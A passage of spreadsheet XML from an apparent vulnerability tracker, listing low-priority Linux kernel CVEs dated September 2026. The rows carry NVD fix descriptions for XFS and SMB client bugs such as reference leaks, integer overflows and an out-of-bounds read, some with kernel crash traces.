      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr"/>
      <c r="S495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't spin forever on zero-length dirents when salvaging them
LOLLM noticed that xrep_dir_recover_data can spin forever if it
encounters an unused dirent that claims to have length zero.  Fix that,
and prevent the same thing from happening with a zero-length entry.</t>
        </is>
      </c>
      <c r="T495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97546</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97547</t>
        </is>
      </c>
      <c r="D496" s="5" t="inlineStr"/>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="inlineStr"/>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
      <c r="N496" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O496" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P496" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q496" s="5" t="inlineStr"/>
      <c r="R496" s="5" t="inlineStr"/>
      <c r="S496" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix exchange-range reflink flag clearing issue with INO1_WRITTEN
When exchanging two full-file ranges, xmi_can_exchange_reflink_flags()
can move the reflink inode flag from the file that currently has it to
the other file, as long as exactly one side is marked.  This assumes
that the file contents, and therefore all shared extents, are exchanged.
That assumption is not true when XFS_EXCHMAPS_INO1_WRITTEN is set.
xfs_exchmaps_can_skip_mapping() can skip hole and unwritten mappings
from file1, so an exchange can complete without moving every mapping
that the earlier flag-swap decision accounted for.  In that case the
post-operation cleanup can clear the reflink flag from an inode that
still owns shared written extents.  Later writes then take the
non-reflink write path and may update blocks that should still have
been protected by CoW, which shows up as data corruption between
reflink-related files.
Fix this by disabling the reflink flag exchange whenever
XFS_EXCHMAPS_INO1_WRITTEN is requested.  The contents exchange can still
proceed; the conservative outcome is that both inodes keep the reflink
flag.  The regular reflink flag cleanup path can drop the extra flag
later once the inode no longer has shared extents.</t>
        </is>
      </c>
      <c r="T496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97547</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97549</t>
        </is>
      </c>
      <c r="D497" s="5" t="inlineStr"/>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="inlineStr"/>
      <c r="G497" s="5" t="inlineStr"/>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr"/>
      <c r="J497" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K497" s="5" t="inlineStr"/>
      <c r="L497" s="5" t="inlineStr"/>
      <c r="M497" s="5" t="inlineStr"/>
      <c r="N497" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O497" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P497" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q497" s="5" t="inlineStr"/>
      <c r="R497" s="5" t="inlineStr"/>
      <c r="S497" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix under-reservation of blocks when repairing sf directories
Whilst running QA on XFS for-next as of 7.3-rc2 with MKFS_OPTIONS="-n
size=8192", I observed the following (trimmed) dmesg splat:
 XFS: Assertion failed: args-&gt;total &gt;= dp-&gt;i_nblocks - nblks, file: fs/xfs/libxfs/xfs_da_btree.c, line: 2387
 WARNING: fs/xfs/xfs_message.c:104 at assfail+0x46/0x4a [xfs], CPU#0: xfs_scrub/1426511
 CPU: 0 UID: 0 PID: 1426511 Comm: xfs_scrub Tainted: G        W           7.3.0-rc2-djwx #rc2 PREEMPT(lazy)  6e418570b606a39783b0e7e7b30dc407b965f9e8
 Tainted: [W]=WARN
 RIP: 0010:assfail+0x46/0x4a [xfs]
 RSP: 0018:ffffc900010d7890 EFLAGS: 00010246
 RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00000000ffffffd1
 RDX: 0000000000000000 RSI: 0000000000000021 RDI: ffffffffa059fd38
 RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
 R10: 000000000000000a R11: 000000007fffffff R12: ffffc900010d7940
 R13: ffff888368d8f980 R14: ffffc900010d7a48 R15: ffffc900010d78d0
 FS:  00007f445c5ce680(0000) GS:ffff8884a97ea000(0000) knlGS:0000000000000000
 CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 CR2: 00007f443803b9a8 CR3: 0000000107a4b000 CR4: 00000000003506f0
 Call Trace:
  &lt;TASK&gt;
  xfs_da_grow_inode_int+0x2e0/0x300 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_grow_inode+0x6e/0x150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_dir2_sf_to_block+0x149/0x870 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap_prep+0xe2/0x110 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_swap+0xfb/0x2f0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_dir_rebuild_tree+0x99/0x100 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_directory+0x83/0x1c0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xrep_attempt+0x4f/0x1e0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_scrub_metadata+0x393/0x5b0 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_ioc_scrubv_metadata+0x306/0x570 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  xfs_file_ioctl+0xa4f/0x1150 [xfs 5de2257e14108c136f11317e6bbb8ac77efd392c]
  __x64_sys_ioctl+0x76/0xc0
  do_syscall_64+0x7a/0x3b0
  entry_SYSCALL_64_after_hwframe+0x4b/0x53
This is a consequence of commit 0fe77e57588b98, which added the
following assertion to xfs_da_grow_inode_int:
 ASSERT(args-&gt;total &gt;= dp-&gt;i_nblocks - nblks);
Tracing this back to xrep_dir_swap_prep, I noticed that the xfs_da_args
object that's passed to xfs_dir2_sf_to_block sets args-&gt;total to 1.
This is incorrect because mkfs set the directory block size to 8k and
the filesystem block size to 4k.  In other words, args-&gt;total should be
2 here, not 1.
Dave Chinner tripped over the same problem with the same branch through
a different channel -- his test setup set the fs block size to 1k, in
which case the directory block size is still set to 4k.  Here,
args-&gt;total should be 4.
Changing the assignment of args-&gt;total to sc-&gt;mp-&gt;m_dir_geo-&gt;fsbcount
makes the assertion go away, but that isn't a complete fix.  In
xrep_tempexch_estimate, we also incorrectly assume that a shortform
conversion requires 1 fsblock when it should be m_dir_geo-&gt;fsbcount.
Without that, we can under-reserve space in the transaction and cause a
filesystem shutdown.
Note that the xfs_dabuf_nfsb helper will compute the correct value for
directories and xattr, so we use that instead of open-coding the logic.
Also fix xrep_xattr_swap_prep to assign args-&gt;total via xfs_dabuf_nfsb
to avoid one logic bomb if we ever support multi-fsblock attrs.
Tripped-by: 0fe77e57588b98 ("xfs: assert the reservation covers each da fork growth")</t>
        </is>
      </c>
      <c r="T497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97549</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97550</t>
        </is>
      </c>
      <c r="D498" s="5" t="inlineStr"/>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="inlineStr"/>
      <c r="G498" s="5" t="inlineStr"/>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr"/>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr"/>
      <c r="L498" s="5" t="inlineStr"/>
      <c r="M498" s="5" t="inlineStr"/>
      <c r="N498" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O498" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P498" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q498" s="5" t="inlineStr"/>
      <c r="R498" s="5" t="inlineStr"/>
      <c r="S498" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: fix unit conversions in per_binval computation
LOLLM noticed that we're doing the unit conversion in the per_binval
computation backwards -- xfs_buf_inval_log_space's second parameter is
supposed to be in bytes, but max_binval is in units of fsblocks.  Hence
the conversion should be FSB -&gt; B, not the other way around.</t>
        </is>
      </c>
      <c r="T498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97550</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97551</t>
        </is>
      </c>
      <c r="D499" s="5" t="inlineStr"/>
      <c r="E499" s="5" t="inlineStr"/>
      <c r="F499" s="5" t="inlineStr"/>
      <c r="G499" s="5" t="inlineStr"/>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr"/>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr"/>
      <c r="L499" s="5" t="inlineStr"/>
      <c r="M499" s="5" t="inlineStr"/>
      <c r="N499" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O499" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P499" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q499" s="5" t="inlineStr"/>
      <c r="R499" s="5" t="inlineStr"/>
      <c r="S499" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: initialise args-&gt;total for parent pointer updates
xfs_parent_da_args_init() builds an xfs_da_args from a zeroed
xfs_parent_args (kmem_cache_zalloc), leaving args-&gt;total == 0.
xfs_da_grow_inode_int() treats that field as a running block reservation
and subtracts from it; because it is an xfs_extlen_t (uint32_t), the
first attr-fork growth wraps it to ~0U.  That defeats the free-space
check in xfs_alloc_space_available(), and when it coincides with an AG
that has exactly zero available blocks the allocation is clamped to
maxlen 0 and returns -ENOSPC, which xfs_defer_finish_noroll() escalates
to a filesystem shutdown.
Set args-&gt;total the way the log recovery path does
(xfs_attri_recover_work(), xfs_attr_item.c:706), in the add and replace
paths that can grow the fork.  Removals and lookups never grow it, so
they leave the field alone, matching that switch.</t>
        </is>
      </c>
      <c r="T499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97551</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97552</t>
        </is>
      </c>
      <c r="D500" s="5" t="inlineStr"/>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="inlineStr"/>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr"/>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr"/>
      <c r="L500" s="5" t="inlineStr"/>
      <c r="M500" s="5" t="inlineStr"/>
      <c r="N500" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O500" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P500" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q500" s="5" t="inlineStr"/>
      <c r="R500" s="5" t="inlineStr"/>
      <c r="S500" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: initialise error in xfs_defer_finish_one()
xfs_defer_finish_one() declares error without an initialiser and only
assigns it inside the loop over dfp-&gt;dfp_work.  When that list is empty
the loop body never runs, control falls through to the "Done with the
dfp, free it" path, and the function returns an indeterminate value.
An item-less pending item reaches this through xfs_defer_add_barrier(),
which xfs_reap_ag_blocks() uses on any CONFIG_XFS_ONLINE_REPAIR kernel.
xfs_defer_finish_noroll() treats any non-EAGAIN return as fatal, so a
non-zero stack value turns a successful barrier into a
SHUTDOWN_CORRUPT_INCORE in the middle of a repair.  Zero is the correct
result: reaching the free path means the item loop drained without a
non-zero error.</t>
        </is>
      </c>
      <c r="T500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97552</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97553</t>
        </is>
      </c>
      <c r="D501" s="5" t="inlineStr"/>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr"/>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr"/>
      <c r="L501" s="5" t="inlineStr"/>
      <c r="M501" s="5" t="inlineStr"/>
      <c r="N501" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O501" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P501" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q501" s="5" t="inlineStr"/>
      <c r="R501" s="5" t="inlineStr"/>
      <c r="S501" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: lock the healthmon when inserting unmount event
LOLLM complains that xfs_healthmon_unmount does an unlocked insert of
the unmount event into the health monitor's event list.  Fix that.</t>
        </is>
      </c>
      <c r="T501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97553</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97554</t>
        </is>
      </c>
      <c r="D502" s="5" t="inlineStr"/>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="inlineStr"/>
      <c r="G502" s="5" t="inlineStr"/>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr"/>
      <c r="J502" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K502" s="5" t="inlineStr"/>
      <c r="L502" s="5" t="inlineStr"/>
      <c r="M502" s="5" t="inlineStr"/>
      <c r="N502" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O502" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P502" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q502" s="5" t="inlineStr"/>
      <c r="R502" s="5" t="inlineStr"/>
      <c r="S502" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid using uninitialized SIDs in cifs_posix_to_fattr()
cifs_posix_to_fattr() ignores the return value of posix_info_parse().
When a malformed POSIX directory entry is encountered (e.g. invalid
SID lengths from an untrusted server), posix_info_parse() returns -1
without populating the 'parsed' struct.  The uninitialized stack
memory in parsed.owner and parsed.group is then passed to
sid_to_id(), which processes the garbage bytes and passes them to
request_key() to construct a SID string, potentially leaking kernel
stack contents to the userspace idmap daemon.
Fix this by checking the return value and skipping the SID-to-id
mapping when parsing fails.  The remaining fattr fields (timestamps,
mode, etc.) are populated directly from the 'info' pointer so they
are unaffected.</t>
        </is>
      </c>
      <c r="T502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97554</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97556</t>
        </is>
      </c>
      <c r="D503" s="5" t="inlineStr"/>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="inlineStr"/>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr"/>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr"/>
      <c r="L503" s="5" t="inlineStr"/>
      <c r="M503" s="5" t="inlineStr"/>
      <c r="N503" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O503" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P503" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q503" s="5" t="inlineStr"/>
      <c r="R503" s="5" t="inlineStr"/>
      <c r="S503" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: avoid leaking refcount when cifs_sb_tlink() fails
cifs_oplock_break() takes over the reference that
cifs_queue_oplock_break() acquired when it queued the work, and drops it
with _cifsFileInfo_put() once the break has been processed.
Only in setups with "-o multiuser", cifs_sb_tlink() may fail, at which
point cifs_oplock_break() returns without putting the file reference,
mirroring the reference leak we already fixed in the companion patch to
cifs_queue_oplock_break().
This would trigger a crash due to busy inodes on the next unmount:
  BUG: Dentry ... still in use (1) [unmount of cifs cifs]
  VFS: Busy inodes after unmount of cifs (cifs)
Drop the reference on that path as well. Doing so before the out label
mirrors the normal path, which also puts the reference before
cifs_done_oplock_break().
Found by Sashiko code review. The failure path was not exercised at
runtime.</t>
        </is>
      </c>
      <c r="T503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97556</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97558</t>
        </is>
      </c>
      <c r="D504" s="5" t="inlineStr"/>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="inlineStr"/>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr"/>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr"/>
      <c r="L504" s="5" t="inlineStr"/>
      <c r="M504" s="5" t="inlineStr"/>
      <c r="N504" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O504" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P504" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q504" s="5" t="inlineStr"/>
      <c r="R504" s="5" t="inlineStr"/>
      <c r="S504" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix cifsFileInfo reference leak in deferred close
When cifs_close() defers a close, it hands the cifsFileInfo reference
of the closing struct file to the queued work. Each execution of
smb2_deferred_work_close() drops one such reference.
deferred_close_scheduled can be false while the work is pending: the
workqueue clears PENDING when the callback starts to run, before the
callback clears the flag under deferred_lock. A close in that
interval requeues the running work, and the callback then clears the
flag, leaving the requeued work pending with the flag down. A later
cifs_open() can reuse the handle and its cifs_close() reaches the
same branch: queue_delayed_work() fails because the work is still
pending, but cifs_close() returns without dropping the closing file's
reference. The cifsFileInfo count stays pinned and its tlink, dentry
and server handle are leaked.
Check the return value and hand off the reference only when work was
actually queued. Otherwise, use the shared _cifsFileInfo_put(), like
the mod_delayed_work() branch above: the pending execution already
owns its reference.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97558</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97559</t>
        </is>
      </c>
      <c r="D505" s="5" t="inlineStr"/>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="inlineStr"/>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr"/>
      <c r="J505" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K505" s="5" t="inlineStr"/>
      <c r="L505" s="5" t="inlineStr"/>
      <c r="M505" s="5" t="inlineStr"/>
      <c r="N505" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O505" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P505" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr"/>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fail DACL rewrite when the new DACL exceeds 64K
replace_sids_and_copy_aces() and set_chmod_dacl() accumulate the size of
the DACL they build in a u16. That accumulator can wrap.
validate_dacl() caps num_aces at (dacl_size - sizeof(struct smb_acl)) /
20, i.e. 3276 for a maximally sized DACL, while each rewritten ACE can
grow to sizeof(struct smb_ace) (76 bytes) once its SID is replaced with
one carrying SID_MAX_SUB_AUTHORITIES sub-authorities. The worst case is
therefore sizeof(struct smb_acl) + 3276 * 76 = 248984 bytes, far beyond
what a u16 can hold. A wraparound is reached with 863 ACEs.
After the wraparound, ndacl_ptr-&gt;size becomes meaningless and the offset
will point anywhere in the ACE array. As a result, we will see
corruption of the DACL, which then gets sent to the server. This is not
an out-of-bounds write as the allocation now covers the worst-case
expansion, so writes will always go into the buffer.
Adjust the code to use a u32 internally and return -EOVERFLOW in the
overflow case. The operation must be refused, because a DACL can only
hold 2^16-1 bytes on the wire and larger DACLs cannot be represented.
set_chmod_dacl() carries the same pattern and is fixed the same way. It
only wraps once the source DACL comes within roughly 380 bytes of the
64K ceiling, but the failure mode is identical.</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97559</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97560</t>
        </is>
      </c>
      <c r="D506" s="5" t="inlineStr"/>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr"/>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: fix one-byte OOB read in smb2_parse_native_symlink()
When parsing a share-root relative native symlink, memcpy copies
smb_target+1 (skipping the leading separator) but uses
strlen(smb_target)+1 as the length, reading one byte past the
allocated buffer.
This fixes the following KASAN splat when accessing an SMB symlink
with a target of '\a\b':
  BUG: KASAN: slab-out-of-bounds in smb2_parse_native_symlink+0x4f5/0xca0
  Read of size 5 at addr ffff88800878fe21 by task netfsfuzz-execu/1
  CPU: 1 UID: 0 PID: 1 Comm: netfsfuzz-execu Tainted: G N
  7.2.0-11943-g2709dd5ae32f-dirty #1 PREEMPT(lazy)
  Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix,
  1996)
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x7b/0xa0
   print_report+0xd0/0x630
   kasan_report+0xe5/0x120
   kasan_check_range+0x105/0x1b0
   __asan_memcpy+0x23/0x60
   smb2_parse_native_symlink+0x4f5/0xca0
   parse_reparse_point+0x68a/0x1530
   reparse_info_to_fattr+0x752/0xa20
   cifs_get_fattr+0x873/0x15b0
   cifs_get_inode_info+0xc0/0x310
   cifs_lookup+0x308/0xa70
   __lookup_slow+0x122/0x2b0
   lookup_slow+0x50/0x70
   path_lookupat+0x525/0xaf0
   filename_lookup+0x1f2/0x550
   vfs_statx+0xd1/0x1a0
   vfs_fstatat+0x65/0xc0
   __do_sys_newfstatat+0x9a/0x120
   do_syscall_64+0xdd/0x4a0
   entry_SYSCALL_64_after_hwframe+0x77/0x7f</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97560</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97561</t>
        </is>
      </c>
      <c r="D507" s="5" t="inlineStr"/>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="inlineStr"/>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr"/>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
